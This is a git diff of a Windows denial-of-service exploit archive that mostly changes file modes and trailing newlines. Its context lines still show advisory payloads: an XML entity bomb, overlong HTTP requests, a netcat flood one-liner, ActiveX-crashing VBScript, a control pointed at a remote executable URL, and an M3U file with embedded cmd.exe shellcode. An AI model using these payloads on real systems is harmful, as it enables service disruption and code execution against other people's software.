index c4ef51de0..455a53af1 --- a/platforms/windows/dos/23145.c +++ b/platforms/windows/dos/23145.c @@ -70,4 +70,4 @@ void main(int argc, char *argv[]) write(sock, &buffer[0], strlen(buffer)); close(sock); free(buffer); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/dos/23146.c b/platforms/windows/dos/23146.c old mode 100755 new mode 100644 index e5247c059..748c1aae9 --- a/platforms/windows/dos/23146.c +++ b/platforms/windows/dos/23146.c @@ -70,4 +70,4 @@ void main(int argc, char *argv[]) write(sock, &buffer[0], strlen(buffer)); close(sock); free(buffer); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/dos/23150.c b/platforms/windows/dos/23150.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23165.txt b/platforms/windows/dos/23165.txt old mode 100755 new mode 100644 index ef20af49e..ee82e9914 --- a/platforms/windows/dos/23165.txt +++ b/platforms/windows/dos/23165.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/8666/info A problem has been identified in Sun Java when handling XML documents with specific constructs. Because of this, an attacker with the ability to cause the software to parse malicious XML documents may have the ability to crash a system hosting Sun Java. -<?xml version="1.0" encoding ="UTF-8"?> <!DOCTYPE foobar[ <!ENTITY x100 "foobar"> <!ENTITY x99 "&x100;&x100;"> <!ENTITY x98 "&x99;&x99;"> ... <!ENTITY x2 "&x3;&x3;"> <!ENTITY x1 "&x2;&x2;"> ]><SOAP-ENV:Envelope xmlns:SOAP-ENV=...><SOAP-ENV:Body><ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV:encodingStyle="..."><foobar xsi:type="xsd:string">&x1;</foobar></ns1:aaa></SOAP-ENV:Body></SOAP-ENV:Envelope> \ No newline at end of file +<?xml version="1.0" encoding ="UTF-8"?> <!DOCTYPE foobar[ <!ENTITY x100 "foobar"> <!ENTITY x99 "&x100;&x100;"> <!ENTITY x98 "&x99;&x99;"> ... <!ENTITY x2 "&x3;&x3;"> <!ENTITY x1 "&x2;&x2;"> ]><SOAP-ENV:Envelope xmlns:SOAP-ENV=...><SOAP-ENV:Body><ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV:encodingStyle="..."><foobar xsi:type="xsd:string">&x1;</foobar></ns1:aaa></SOAP-ENV:Body></SOAP-ENV:Envelope> \ No newline at end of file diff --git a/platforms/windows/dos/23177.txt b/platforms/windows/dos/23177.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23191.txt b/platforms/windows/dos/23191.txt old mode 100755 new mode 100644 index 4bcb18d1e..b3e79d7c8 --- a/platforms/windows/dos/23191.txt +++ b/platforms/windows/dos/23191.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/8712/info Savant Web Server is prone to a denial of service vulnerability. The server reportedly goes into an infinite loop upon receipt of a specially crafted HTTP GET request that causes the server to repeatedly redirect to the default page. -http://www.example.com/%x \ No newline at end of file +http://www.example.com/%x \ No newline at end of file diff --git a/platforms/windows/dos/23201.txt b/platforms/windows/dos/23201.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23215.html b/platforms/windows/dos/23215.html old mode 100755 new mode 100644 index 70552f3a5..1a788f51b --- a/platforms/windows/dos/23215.html +++ b/platforms/windows/dos/23215.html @@ -22,4 +22,4 @@ In 'two' <div id="three"> In 'three' </div> -</body> \ No newline at end of file +</body> \ No newline at end of file diff --git a/platforms/windows/dos/23216.txt b/platforms/windows/dos/23216.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23234.c b/platforms/windows/dos/23234.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23235.txt b/platforms/windows/dos/23235.txt old mode 100755 new mode 100644 index 1a7730dcc..c928570a0 --- a/platforms/windows/dos/23235.txt +++ b/platforms/windows/dos/23235.txt @@ -22,4 +22,4 @@ Escape character is '^]'. 0 0 0 -0 \ No newline at end of file +0 \ No newline at end of file diff --git a/platforms/windows/dos/23246.txt b/platforms/windows/dos/23246.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23254.txt b/platforms/windows/dos/23254.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23267.txt b/platforms/windows/dos/23267.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23273.html b/platforms/windows/dos/23273.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23279.txt b/platforms/windows/dos/23279.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23280.txt b/platforms/windows/dos/23280.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23288.txt b/platforms/windows/dos/23288.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23293.txt b/platforms/windows/dos/23293.txt old mode 100755 new mode 100644 index f55b7165e..ce6466c54 --- a/platforms/windows/dos/23293.txt +++ b/platforms/windows/dos/23293.txt @@ -4,4 +4,4 @@ Yahoo! Messenger is prone to a remotely exploitable buffer overrun vulnerability An attacker may theoretically exploit this condition to execute arbitrary code on a client system. This condition can be exploited via a malicious 'sendfile' link. -YMSGR:sendfile?[victim_yahooID]+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%&c%c:\[somefile] \ No newline at end of file +YMSGR:sendfile?[victim_yahooID]+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%&c%c:\[somefile] \ No newline at end of file diff --git a/platforms/windows/dos/23337.c b/platforms/windows/dos/23337.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23388.txt b/platforms/windows/dos/23388.txt old mode 100755 new mode 100644 index 2b7e2c3de..2c65ba95a --- a/platforms/windows/dos/23388.txt +++ b/platforms/windows/dos/23388.txt @@ -7,4 +7,4 @@ The issue presents itself due to a flaw in download functionality that is provid cmd dlfile server.cfg cmd dlfile addons/amx/users.ini cmd dlfile addons/amx/mysql.cfg -cmd dlfile maps/de_torn.bsp \ No newline at end of file +cmd dlfile maps/de_torn.bsp \ No newline at end of file diff --git a/platforms/windows/dos/23469.txt b/platforms/windows/dos/23469.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23480.txt b/platforms/windows/dos/23480.txt old mode 100755 new mode 100644 index 4f950c2b1..92dcba925 --- a/platforms/windows/dos/23480.txt +++ b/platforms/windows/dos/23480.txt @@ -4,4 +4,4 @@ It has been reported that Surfboard httpd is prone to a remote buffer overflow c Surfboard version 1.1.9 has been reported to be prone to this issue, however, other versions may be affected as well. -GET /AAAAAAAAAAAA..x1024++ HTTP/1.1\r\n\r\n \ No newline at end of file +GET /AAAAAAAAAAAA..x1024++ HTTP/1.1\r\n\r\n \ No newline at end of file diff --git a/platforms/windows/dos/23496.txt b/platforms/windows/dos/23496.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23501.c b/platforms/windows/dos/23501.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23504.txt b/platforms/windows/dos/23504.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23506.txt b/platforms/windows/dos/23506.txt old mode 100755 new mode 100644 index 5944ef5ff..1e103784d --- a/platforms/windows/dos/23506.txt +++ b/platforms/windows/dos/23506.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9337/info GoodTech Telnet Server is reportedly prone to a denial of service vulnerability. This condition occurs prior to authentication when excessive data is received by the server. Exploitation could result in memory corruption, which could in turn be leveraged to execute arbitrary code, though this has not been confirmed by Symantec. -perl -e 'print "a"x8245' | nc www.example.com 23 \ No newline at end of file +perl -e 'print "a"x8245' | nc www.example.com 23 \ No newline at end of file diff --git a/platforms/windows/dos/23512.txt b/platforms/windows/dos/23512.txt old mode 100755 new mode 100644 index 94ac693b8..cb45aca42 --- a/platforms/windows/dos/23512.txt +++ b/platforms/windows/dos/23512.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9348/info Surfnet is prone to a denial of service vulnerability via the CMD_CREDITCARD_CHARGE command. By issuing this command with malformed arguments, it is possible to crash the software. When the software crashes, it will drop the kiosk user into the underlying operating system. -C:\Surfnet\WWWRoot\CMD_CREDITCARD_CHARGE:Charge=20 \ No newline at end of file +C:\Surfnet\WWWRoot\CMD_CREDITCARD_CHARGE:Charge=20 \ No newline at end of file diff --git a/platforms/windows/dos/23530.c b/platforms/windows/dos/23530.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23534.txt b/platforms/windows/dos/23534.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23538.txt b/platforms/windows/dos/23538.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23565.txt b/platforms/windows/dos/23565.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23567.txt b/platforms/windows/dos/23567.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23568.txt b/platforms/windows/dos/23568.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23569.txt b/platforms/windows/dos/23569.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23574.txt b/platforms/windows/dos/23574.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23584.c b/platforms/windows/dos/23584.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23595.txt b/platforms/windows/dos/23595.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23602.txt b/platforms/windows/dos/23602.txt old mode 100755 new mode 100644 index 33bb8090c..9f2bbf881 --- a/platforms/windows/dos/23602.txt +++ b/platforms/windows/dos/23602.txt @@ -4,4 +4,4 @@ A vulnerability has been reported to exist in mIRC that may allow a remote attac It has been reported that the issue will present itself only in certain circumstances. Although unconfirmed, due to the nature of this vulnerability it has been conjectured that a remote attacker may potentially lever this issue to have arbitrary code executed in the context of the affected mIRC client. -alias mirc612 { echo -a *** Sending exploit to $$1 | .raw PRIVMSG $$1 $+(:,$chr(1),DCC) send $str($rand(a,z) $+ $chr(256),250) $+ 0 $+ .txt 2130706433 $+(8192,$chr(1)) } \ No newline at end of file +alias mirc612 { echo -a *** Sending exploit to $$1 | .raw PRIVMSG $$1 $+(:,$chr(1),DCC) send $str($rand(a,z) $+ $chr(256),250) $+ 0 $+ .txt 2130706433 $+(8192,$chr(1)) } \ No newline at end of file diff --git a/platforms/windows/dos/23614.txt b/platforms/windows/dos/23614.txt old mode 100755 new mode 100644 index cee3fdb67..8f9e17177 --- a/platforms/windows/dos/23614.txt +++ b/platforms/windows/dos/23614.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9519/info A problem has been identified in the handling of specific types of requests by SurfNOW. Upon receiving specially crafted HTTP GET requests, it is possible for a remote attacker to crash a vulnerable implementation, denying service to the user. -GET \aaaaaaaaaaaaa[ 490 kb of a ]aaaa HTTP/1.1\n\n\n \ No newline at end of file +GET \aaaaaaaaaaaaa[ 490 kb of a ]aaaa HTTP/1.1\n\n\n \ No newline at end of file diff --git a/platforms/windows/dos/23633.txt b/platforms/windows/dos/23633.txt old mode 100755 new mode 100644 index 7ec1b7d9b..fab48edfd --- a/platforms/windows/dos/23633.txt +++ b/platforms/windows/dos/23633.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/9549/info A vulnerability has been reported in the Crob FTP server, which occurs due to a lack of validation of input from the user. By issuing a malformed request a malevolent user may be able to force the server to crash, denying service to legitimate users. dir -......................................................................................................................................................................................................................................................./* \ No newline at end of file +......................................................................................................................................................................................................................................................./* \ No newline at end of file diff --git a/platforms/windows/dos/23654.txt b/platforms/windows/dos/23654.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23660.c b/platforms/windows/dos/23660.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23665.c b/platforms/windows/dos/23665.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23686.txt b/platforms/windows/dos/23686.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23689.c b/platforms/windows/dos/23689.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23692.txt b/platforms/windows/dos/23692.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23693.txt b/platforms/windows/dos/23693.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23700.txt b/platforms/windows/dos/23700.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23701.txt b/platforms/windows/dos/23701.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23708.c b/platforms/windows/dos/23708.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23709.c b/platforms/windows/dos/23709.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23713.txt b/platforms/windows/dos/23713.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23716.txt b/platforms/windows/dos/23716.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23731.txt b/platforms/windows/dos/23731.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23752.c b/platforms/windows/dos/23752.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23761.c b/platforms/windows/dos/23761.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23762.c b/platforms/windows/dos/23762.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23846.txt b/platforms/windows/dos/23846.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23850.txt b/platforms/windows/dos/23850.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23911.txt b/platforms/windows/dos/23911.txt old mode 100755 new mode 100644 index 246e4efe5..c3beb8c6e --- a/platforms/windows/dos/23911.txt +++ b/platforms/windows/dos/23911.txt @@ -19,4 +19,4 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" Set mymy2= CreateObject("MSWebDVD.MSWebDVD.1") mymy2.AcceptParentalLevelChange False, "xc", a -</script> \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/windows/dos/23912.txt b/platforms/windows/dos/23912.txt old mode 100755 new mode 100644 index bb18ba051..1d0025d5a --- a/platforms/windows/dos/23912.txt +++ b/platforms/windows/dos/23912.txt @@ -9,4 +9,4 @@ This vulnerability is reported to be tested in Flash Player 7.0 r19 running on W <script language=vbscript> Set mymy2= CreateObject("ShockwaveFlash.ShockwaveFlash.1") mymy2.LoadMovie 1,"c6ool.swf" -</script> \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/windows/dos/23915.txt b/platforms/windows/dos/23915.txt old mode 100755 new mode 100644 index 8c61fd012..8a3a8c94d --- a/platforms/windows/dos/23915.txt +++ b/platforms/windows/dos/23915.txt @@ -12,4 +12,4 @@ Set cooler = CreateObject("Photoshop.Application.8" ) <script language=vbscript> dim cooler Set cooler = CreateObject("Photoshop.PhotoCDOpenOptions.8" ) -</script> \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/windows/dos/23916.txt b/platforms/windows/dos/23916.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23917.txt b/platforms/windows/dos/23917.txt old mode 100755 new mode 100644 index 9e25b3c54..e74c4a423 --- a/platforms/windows/dos/23917.txt +++ b/platforms/windows/dos/23917.txt @@ -13,4 +13,4 @@ Set mymy = CreateObject("ASControl.ReportHebrew.1" ) a="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" mymy.Internacional a -</script> \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/windows/dos/23918.txt b/platforms/windows/dos/23918.txt old mode 100755 new mode 100644 index 65e8e7605..34acf40c3 --- a/platforms/windows/dos/23918.txt +++ b/platforms/windows/dos/23918.txt @@ -9,4 +9,4 @@ Panda ActiveScan 5.0 has been reported to be prone to this issue. dim mymy Set mymy = CreateObject("ASControls.InstallEngineCtl.1" ) mymy.SetSitesFile "http://rafiwarez.tripod.com/ncx.exe", ASIA, hebrew -</script> \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/windows/dos/23919.txt b/platforms/windows/dos/23919.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/23920.txt b/platforms/windows/dos/23920.txt old mode 100755 new mode 100644 index 9903d6422..3d72e731c --- a/platforms/windows/dos/23920.txt +++ b/platforms/windows/dos/23920.txt @@ -100,4 +100,4 @@ mymy2.ScanParam = "c:\" & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & a & "\" mymy2.Scan -</script>Press O.K<BR>Press O.K<BR>Now Close The Window \ No newline at end of file +</script>Press O.K<BR>Press O.K<BR>Now Close The Window \ No newline at end of file diff --git a/platforms/windows/dos/23925.txt b/platforms/windows/dos/23925.txt old mode 100755 new mode 100644 index 9178548a3..8a16c55a8 --- a/platforms/windows/dos/23925.txt +++ b/platforms/windows/dos/23925.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/10075/info Kerio Personal Firewall includes Web URI Filtering functionality. A denial of service vulnerability has been reported to affect Kerio Personal Firewall when Web Filtering functionality is enabled. The issue presents itself when Web Filtering procedures handle a URI that contains certain characters. -http://www.example.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=^S^R^S \ No newline at end of file +http://www.example.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=^S^R^S \ No newline at end of file diff --git a/platforms/windows/dos/23927.txt b/platforms/windows/dos/23927.txt old mode 100755 new mode 100644 index 87a011829..53ee7144c --- a/platforms/windows/dos/23927.txt +++ b/platforms/windows/dos/23927.txt @@ -4,4 +4,4 @@ A denial of service vulnerability has been reported to affect Opera Web Browser. A remote attacker may exploit this vulnerability to cause Opera to crash. -<iframe src="?" height=0 width=0> \ No newline at end of file +<iframe src="?" height=0 width=0> \ No newline at end of file diff --git a/platforms/windows/dos/23944.php b/platforms/windows/dos/23944.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/2400.html b/platforms/windows/dos/2400.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24010.txt b/platforms/windows/dos/24010.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24022.txt b/platforms/windows/dos/24022.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24042.txt b/platforms/windows/dos/24042.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24051.txt b/platforms/windows/dos/24051.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24103.txt b/platforms/windows/dos/24103.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24112.txt b/platforms/windows/dos/24112.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24119.txt b/platforms/windows/dos/24119.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24128.txt b/platforms/windows/dos/24128.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24135.html b/platforms/windows/dos/24135.html old mode 100755 new mode 100644 index e9b4ecb0a..4d1addab6 --- a/platforms/windows/dos/24135.html +++ b/platforms/windows/dos/24135.html @@ -10,8 +10,4 @@ This issue could be exploited by a remote attacker to cause a denial of service <td> </form> </table> -<link rel="stylesheet" href="link.css"> - - - - \ No newline at end of file +<link rel="stylesheet" href="link.css"> \ No newline at end of file diff --git a/platforms/windows/dos/24144.txt b/platforms/windows/dos/24144.txt old mode 100755 new mode 100644 index 280282227..b2f88da5d --- a/platforms/windows/dos/24144.txt +++ b/platforms/windows/dos/24144.txt @@ -17,4 +17,4 @@ HEAD: 1. HEAD /something HTTP/1.1 - 2. HEAD /something HTTP/1.1\n -- \ No newline at end of file +- \ No newline at end of file diff --git a/platforms/windows/dos/24145.c b/platforms/windows/dos/24145.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24146.bat b/platforms/windows/dos/24146.bat old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24147.bat b/platforms/windows/dos/24147.bat old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24178.txt b/platforms/windows/dos/24178.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24208.c b/platforms/windows/dos/24208.c old mode 100755 new mode 100644 index 9e6b49e03..0e1dd9227 --- a/platforms/windows/dos/24208.c +++ b/platforms/windows/dos/24208.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/10541/info It is reported that FreeIPS is susceptible to a denial of service vulnerability. @@ -9,6 +10,7 @@ The software correctly generates a TCP RST+ACK packet to the originating client, An attacker can deny service to any TCP application protected by FreeIPS, denying network service to legitimate users. The attacker would have to know or guess a string pattern that matches a regular expression in FreeIPS to successfully exploit this vulnerability. +*/ int main(int argc, char *argv[]) { diff --git a/platforms/windows/dos/24209.txt b/platforms/windows/dos/24209.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24211.txt b/platforms/windows/dos/24211.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24267.txt b/platforms/windows/dos/24267.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24288.txt b/platforms/windows/dos/24288.txt old mode 100755 new mode 100644 index 162515da5..35833c6f5 --- a/platforms/windows/dos/24288.txt +++ b/platforms/windows/dos/24288.txt @@ -19,4 +19,4 @@ next ' just do what you like set fso = createobject("scripting.filesystemobject") -fso.createtextfile("c:\byenav.txt").write "=)" \ No newline at end of file +fso.createtextfile("c:\byenav.txt").write "=)" \ No newline at end of file diff --git a/platforms/windows/dos/24319.txt b/platforms/windows/dos/24319.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24343.txt b/platforms/windows/dos/24343.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24362.txt b/platforms/windows/dos/24362.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24395.txt b/platforms/windows/dos/24395.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24411.c b/platforms/windows/dos/24411.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24412.c b/platforms/windows/dos/24412.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24416.txt b/platforms/windows/dos/24416.txt old mode 100755 new mode 100644 index ba09bfe15..b842cd5a9 --- a/platforms/windows/dos/24416.txt +++ b/platforms/windows/dos/24416.txt @@ -15,4 +15,4 @@ User (ibm:(none)): ftp Password: 230 user logged in ftp> cd a../a -Connection closed by remote host. \ No newline at end of file +Connection closed by remote host. \ No newline at end of file diff --git a/platforms/windows/dos/24426.html b/platforms/windows/dos/24426.html old mode 100755 new mode 100644 index b0fa78cff..6dd840d9d --- a/platforms/windows/dos/24426.html +++ b/platforms/windows/dos/24426.html @@ -15,4 +15,4 @@ document.crash.text; <body onLoad="dSend()"> <embed src="" type="CCCC" name="crash" > </embed> -</body></html> \ No newline at end of file +</body></html> \ No newline at end of file diff --git a/platforms/windows/dos/24448.svg b/platforms/windows/dos/24448.svg old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24463.txt b/platforms/windows/dos/24463.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24485.txt b/platforms/windows/dos/24485.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24511.txt b/platforms/windows/dos/24511.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24580.txt b/platforms/windows/dos/24580.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24586.txt b/platforms/windows/dos/24586.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24605.txt b/platforms/windows/dos/24605.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24618.c b/platforms/windows/dos/24618.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24620.c b/platforms/windows/dos/24620.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24634.c b/platforms/windows/dos/24634.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24635.c b/platforms/windows/dos/24635.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24636.c b/platforms/windows/dos/24636.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24637.c b/platforms/windows/dos/24637.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24639.c b/platforms/windows/dos/24639.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24640.c b/platforms/windows/dos/24640.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24679.txt b/platforms/windows/dos/24679.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24684.txt b/platforms/windows/dos/24684.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24699.txt b/platforms/windows/dos/24699.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24705.txt b/platforms/windows/dos/24705.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24708.txt b/platforms/windows/dos/24708.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24726.txt b/platforms/windows/dos/24726.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24738.c b/platforms/windows/dos/24738.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24741.txt b/platforms/windows/dos/24741.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24743.txt b/platforms/windows/dos/24743.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24775.html b/platforms/windows/dos/24775.html old mode 100755 new mode 100644 index a08a23c1e..ef2472b4f --- a/platforms/windows/dos/24775.html +++ b/platforms/windows/dos/24775.html @@ -5,4 +5,4 @@ Microsoft Internet is prone to a vulnerability that may result in a browser cras <HTML> <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT> <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT> -</HTML> \ No newline at end of file +</HTML> \ No newline at end of file diff --git a/platforms/windows/dos/24776.html b/platforms/windows/dos/24776.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24841.txt b/platforms/windows/dos/24841.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24930.txt b/platforms/windows/dos/24930.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24962.txt b/platforms/windows/dos/24962.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24966.txt b/platforms/windows/dos/24966.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/24972.c b/platforms/windows/dos/24972.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/25007.txt b/platforms/windows/dos/25007.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/25012.c b/platforms/windows/dos/25012.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/25061.txt b/platforms/windows/dos/25061.txt old mode 100755 new mode 100644 index c37c29d3d..9f676d7d2 --- a/platforms/windows/dos/25061.txt +++ b/platforms/windows/dos/25061.txt @@ -6,4 +6,4 @@ This issue will facilitate remote exploitation as an attacker may distribute mal #EXTM3U #EXTINF:5,DJ Mike Llama - Llama Whippin' Intro -cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHnT _IJJJ‹å3ÿWƒìÆEøcÆEùmÆEúdÆEû.ÆEüeÆEýxÆEþe¸D€¿wP]øSÿÐ \ No newline at end of file +cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHnT _IJJJ‹å3ÿWƒìÆEøcÆEùmÆEúdÆEû.ÆEüeÆEýxÆEþe¸D€¿wP]øSÿÐ \ No newline at end of file diff --git a/platforms/windows/dos/25083.txt b/platforms/windows/dos/25083.txt old mode 100755 new mode 100644 index b2efbe53b..fffe0f16b --- a/platforms/windows/dos/25083.txt +++ b/platforms/windows/dos/25083.txt @@ -5,4 +5,4 @@ RaidenHTTPD is reported prone to a remote file disclosure vulnerability. It is r A remote attacker may exploit this issue to disclose the contents of web server readable files. GET windows/system.ini HTTP/1.1 -Host: localhost \ No newline at end of file +Host: localhost \ No newline at end of file diff --git a/platforms/windows/dos/25085.txt b/platforms/windows/dos/25085.txt old mode 100755 new mode 100644 index ce248303d..bde0c918a --- a/platforms/windows/dos/25085.txt +++ b/platforms/windows/dos/25085.txt @@ -14,4 +14,4 @@ for(c=1;c<5000;c++) mylongstring = mylongstring + myjunk; } window.open("http://www.hhs.gov/ocr/privacysummary.rtf%0a"+mylongstring); -</script> \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/windows/dos/25128.txt b/platforms/windows/dos/25128.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/25135.txt b/platforms/windows/dos/25135.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/25140.txt b/platforms/windows/dos/25140.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/25219.txt b/platforms/windows/dos/25219.txt old mode 100755 new mode 100644 index 5879e7f76..1afa44af6 --- a/platforms/windows/dos/25219.txt +++ b/platforms/windows/dos/25219.txt @@ -4,4 +4,4 @@ A remote denial of service vulnerability affects Spinworks Application Server. T An attacker may leverage this issue to trigger a denial of service condition in the affected software. -http://www.example.com:5002/?sid=. \ No newline at end of file +http://www.example.com:5002/?sid=. \ No newline at end of file diff --git a/platforms/windows/dos/25231.txt b/platforms/windows/dos/25231.txt old mode 100755 new mode 100644 index f28aad788..e8a68a366 --- a/platforms/windows/dos/25231.txt +++ b/platforms/windows/dos/25231.txt @@ -14,4 +14,4 @@ A hex dumped EMF file: 0000050 cc 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 0000060 00 00 00 00 0e 00 00 00 14 00 00 00 41 00 00 00 0000070 